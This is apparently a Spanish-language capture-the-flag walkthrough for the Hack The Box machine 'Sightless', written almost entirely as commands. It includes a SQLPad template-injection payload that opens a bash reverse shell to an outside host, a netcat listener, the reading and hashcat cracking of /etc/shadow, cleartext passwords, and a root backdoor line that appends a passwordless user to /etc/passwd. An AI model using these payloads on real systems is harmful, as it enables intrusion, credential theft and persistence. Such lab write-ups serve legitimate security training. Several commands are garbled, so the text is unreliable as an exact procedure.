
Sightless
HTB Linux
nmap -A -p- -oA sightless 10.129.231.103 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA sightless 10.129.231.103
echo "10.129.231.103 sightless.htb sqlpad.sightless.htb" | sudo tee -a /etc/hosts
nmap -sU -O -p- -oA sightless-udp 10.129.231.103
ping -c 1 10.129.231.103
nmap -p- --open -T5 -v -n 10.129.231.103
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.231.103 -oG allPorts
extractPorts allPorts
nmap -sCV -p21,22,80 10.129.231.103 -oN targeted
bc targeted -l rb
whatweb http://sightless.htb
Nos dirigimos al servicio de sqlpad
Podemos ver una explicacion de como atacar a esta aplicacion
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb
Ponemos lo siguiente en Database:
{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.16.37/443 0>&1"') }}
nc -lvnp 443
script /dev/null -c bash
Despues hacer un ctrl Z
stty raw -echo; fg
reset
El terminal type es:
xterm
export TERM=xterm
export SHELL=bash
cat /etc/shadow
Crackeamos la contrasena
hashcat -m 1800 '$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/' /usr/share/wordlist/rockyou.txt
Vemos que la contrasena para michael Credenciales -> michael:insaneclownposse
ssh michael@sightless.htb
find \ -perm -4000 2>/dev/null
sudo -l
getcap -r / 2>/dev/null
ps -faux
cat /etc/apache2/sites-enabled/000-default.conf | grep -v '#'
Vemos que tenemos algo en el puerto 8080
ss -tln
sshpass -p 'insaneclownposse' ssh michael@sightless.htb -L 8081:127.0.0.1:8080
Nos dirigimos a http://127.0.0.1:8081
Vemos que le falta admin a la pagina
Agregamos lo siugiente a /etc/hosts por este momento
Nos dirigimos a http://admin.sightless.htb:8081/
Las credenciales de michael no me funcionan
Trate con ftp y no tuve suerte igual.
ftp anonymous@sightless.htb
sudo apt install lftp
Hacemos unos cambios al payload.txt y abrimos burpsuite
Podemos leer algo de froxlor
https://github.com/froxlor/Froxlor/security/advisories/GHSA-x525-54hf-xr53
Nos dirigimos a Admin y vemos el nuevo usuario
Cambiamos la contrasena
Nos dirigimos a chrome://inspect/#devices
Nos vamos a la pestana de Network y vemos las siguiente credenciales
admin:ForlorfroxAdmin
echo "echo 'cu3rv0x::0:0:cu3rv0x:/root:/bin/bash' >> /etc/passwd" rev.sh
Cambiamos el comando de reinicio y el directorio de php-fpm
cat /root/root.txt